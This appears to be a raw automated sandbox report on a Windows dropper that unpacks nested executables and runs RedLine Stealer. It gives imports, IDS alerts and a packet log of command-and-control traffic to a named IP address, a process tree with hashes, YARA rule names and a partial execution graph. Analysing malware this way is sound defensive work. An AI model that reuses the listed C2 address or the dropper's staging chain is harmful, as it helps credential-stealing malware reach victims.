                                                                                                                                                                                                    RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                    RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                    RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                    RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                    RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                    RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                    RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                    RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                    RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                    RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                    RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                    RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                    RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                    RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                    RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                    RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                    RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                    RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                    RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                    RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                    RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                    RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                    RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                    RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                    RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x28bb00xea680Microsoft Cabinet archive data, many, 960128 bytes, 2 files, at 0x2c +A "shS06Up82.exe" +A "rTV61uz75.exe", ID 2177, number 1, 36 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132300x4dataEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132340x24dataEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132580x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132600x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132680x4dataEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x11326c0xedataEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x11327c0x4dataEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132800xedataEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132900x4dataEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132940x5ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x11329c0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                    RT_RCDATA0x1132a40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                    RT_GROUP_ICON0x1132ac0xbcdataEnglishUnited States
                                                                                                                                                                                                    RT_VERSION0x1133680x408dataEnglishUnited States
                                                                                                                                                                                                    RT_VERSION0x1137700x410dataRussianRussia
                                                                                                                                                                                                    RT_MANIFEST0x113b800x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                    KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                    GDI32.dllGetDeviceCaps
                                                                                                                                                                                                    USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                    msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                    COMCTL32.dll
                                                                                                                                                                                                    Cabinet.dll
                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                    RussianRussia
                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    193.233.20.23192.168.2.54124497032043234 02/25/23-09:08:56.956124TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    192.168.2.5193.233.20.234970341242043233 02/25/23-09:08:55.914790TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    192.168.2.5193.233.20.234970341242043231 02/25/23-09:09:12.429866TCP2043231ET TROJAN Redline Stealer TCP CnC Activity497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Feb 25, 2023 09:08:55.614931107 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:08:55.637660980 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:08:55.638942003 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:08:55.914789915 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:08:55.937110901 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:08:55.979976892 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:08:56.933667898 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:08:56.956124067 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:08:57.011218071 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:06.982496023 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:07.006553888 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:07.006591082 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:07.006613016 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:07.006822109 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.686397076 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.709158897 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.745297909 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.767877102 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.811350107 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.894150972 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.916376114 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.916424990 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.916996002 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:08.965553999 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.006890059 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.028915882 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.029997110 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.053344965 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.076647997 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.121699095 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.223269939 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.245923042 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:09.293574095 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.063241959 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.085978985 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.137418985 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.213115931 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.235770941 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.251467943 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.274241924 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.313091993 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.335161924 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.335233927 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.335494041 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.352266073 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.375215054 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.376460075 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.398834944 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:10.449965954 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.067579031 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.120611906 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.179887056 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.221035957 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.243592024 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.298834085 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.350429058 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.373136997 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.377667904 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.400060892 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.405543089 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.428122044 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.429866076 CET497034124192.168.2.5193.233.20.23
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.452549934 CET412449703193.233.20.23192.168.2.5
                                                                                                                                                                                                    Feb 25, 2023 09:09:12.495861053 CET497034124192.168.2.5193.233.20.23

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                    Start time:09:08:23
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\y0EWt2mE9h.exe
                                                                                                                                                                                                    Imagebase:0xe70000
                                                                                                                                                                                                    File size:1116672 bytes
                                                                                                                                                                                                    MD5 hash:0588E4E46299165692A58B2046B3EA12
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                    Start time:09:08:24
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                                                                                                                                                                                                    Imagebase:0x3e0000
                                                                                                                                                                                                    File size:929792 bytes
                                                                                                                                                                                                    MD5 hash:1D818CDC54AEBE2E587F77D717B0D1C0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 56%, ReversingLabs
                                                                                                                                                                                                    • Detection: 46%, Virustotal, Browse
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                    Start time:09:08:25
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                    File size:699904 bytes
                                                                                                                                                                                                    MD5 hash:611B6D7CD33B7C08EFA3757F4080FF78
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 54%, ReversingLabs
                                                                                                                                                                                                    • Detection: 41%, Virustotal, Browse
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                    Start time:09:08:26
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                                                                                                                                                                                                    Imagebase:0xa60000
                                                                                                                                                                                                    File size:409088 bytes
                                                                                                                                                                                                    MD5 hash:830F4723EC8EAD8F959AF2AC394E2E8F
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 54%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                    Start time:09:08:26
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                                                                                                                                                                                                    Imagebase:0x690000
                                                                                                                                                                                                    File size:11616 bytes
                                                                                                                                                                                                    MD5 hash:19C22162FD676451E1967474A4076E6F
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 56%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                    Start time:09:08:36
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                    Start time:09:08:42
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:351744 bytes
                                                                                                                                                                                                    MD5 hash:3C88EF8689CBDA12A3A7C5D586E5FA04
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.409089171.0000000002F47000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 46%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                    Start time:09:08:45
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                    Start time:09:08:53
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                    Start time:09:09:02
                                                                                                                                                                                                    Start date:25/02/2023
                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                    Imagebase:0x7ff64b480000
                                                                                                                                                                                                    File size:69632 bytes
                                                                                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:28.7%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:29.5%
                                                                                                                                                                                                      Total number of Nodes:962
                                                                                                                                                                                                      Total number of Limit Nodes:25
                                                                                                                                                                                                      execution_graph 2196 e76a60 2213 e77155 2196->2213 2198 e76a65 2199 e76a76 GetStartupInfoW 2198->2199 2200 e76a93 2199->2200 2201 e76aa8 2200->2201 2202 e76aaf Sleep 2200->2202 2203 e76ac7 _amsg_exit 2201->2203 2205 e76ad1 2201->2205 2202->2200 2203->2205 2204 e76b13 _initterm 2208 e76b2e __IsNonwritableInCurrentImage 2204->2208 2205->2204 2207 e76af4 2205->2207 2205->2208 2206 e76bd6 _ismbblead 2206->2208 2208->2206 2210 e76c1e 2208->2210 2211 e76bbe exit 2208->2211 2218 e72bfb GetVersion 2208->2218 2210->2207 2212 e76c27 _cexit 2210->2212 2211->2208 2212->2207 2214 e7717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2213->2214 2215 e7717a 2213->2215 2217 e771cd 2214->2217 2215->2214 2216 e771e2 2215->2216 2216->2198 2217->2216 2219 e72c50 2218->2219 2220 e72c0f 2218->2220 2235 e72caa memset memset memset 2219->2235 2220->2219 2221 e72c13 GetModuleHandleW 2220->2221 2221->2219 2223 e72c22 GetProcAddress 2221->2223 2223->2219 2232 e72c34 2223->2232 2225 e72c8e 2227 e72c97 CloseHandle 2225->2227 2228 e72c9e 2225->2228 2227->2228 2228->2208 2232->2219 2233 e72c89 2329 e71f90 2233->2329 2346 e7468f FindResourceA SizeofResource 2235->2346 2238 e72ef3 2241 e744b9 20 API calls 2238->2241 2239 e72d2d CreateEventA SetEvent 2240 e7468f 7 API calls 2239->2240 2242 e72d57 2240->2242 2243 e72d6e 2241->2243 2244 e72d5b 2242->2244 2245 e72e1f 2242->2245 2248 e7468f 7 API calls 2242->2248 2351 e76ce0 2243->2351 2356 e744b9 2244->2356 2385 e75c9e 2245->2385 2251 e72d9f 2248->2251 2249 e72c62 2249->2225 2276 e72f1d 2249->2276 2251->2244 2255 e72da3 CreateMutexA 2251->2255 2253 e72e30 2253->2238 2254 e72e3a 2256 e72e43 2254->2256 2257 e72e52 FindResourceA 2254->2257 2255->2245 2258 e72dbd GetLastError 2255->2258 2411 e72390 2256->2411 2261 e72e64 LoadResource 2257->2261 2262 e72e6e 2257->2262 2258->2245 2260 e72dca 2258->2260 2263 e72dd5 2260->2263 2264 e72dea 2260->2264 2261->2262 2267 e72e4d 2262->2267 2426 e736ee GetVersionExA 2262->2426 2265 e744b9 20 API calls 2263->2265 2266 e744b9 20 API calls 2264->2266 2268 e72de8 2265->2268 2269 e72dff 2266->2269 2267->2243 2271 e72e04 CloseHandle 2268->2271 2269->2245 2269->2271 2271->2243 2277 e72f3f 2276->2277 2278 e72f6c 2276->2278 2280 e72f5f 2277->2280 2551 e751e5 2277->2551 2570 e75164 2278->2570 2698 e73a3f 2280->2698 2281 e72f71 2311 e7303c 2281->2311 2583 e755a0 2281->2583 2288 e76ce0 4 API calls 2290 e72c6b 2288->2290 2289 e72f86 GetSystemDirectoryA 2291 e7658a 